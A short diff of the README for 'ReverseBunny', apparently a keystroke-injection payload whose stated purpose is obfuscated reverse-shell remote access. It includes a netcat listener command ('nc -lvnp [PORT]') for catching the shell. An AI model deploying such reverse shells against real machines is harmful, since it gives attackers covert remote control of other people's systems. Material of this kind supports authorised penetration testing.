b/payloads/library/remote_access/ReverseBunny/README.md @@ -1,14 +1,14 @@ -Title: ReverseBunny +**Title: ReverseBunny** Author: 0iphor13 -Version: 1.2 +Version: 1.3 -Getting remote access via obfuscated reverse shell. -Change the variables in payload.txt to your attacking maschine & start your listener. +

Getting remote access via obfuscated reverse shell.
+Change the variables in payload.txt to your attacking maschine & start your listener. (for example netcat: nc -lvnp [PORT] )

-Whats new in version 1.2? +Whats new in version 1.3? - Changed the whole payload - Added custom shell design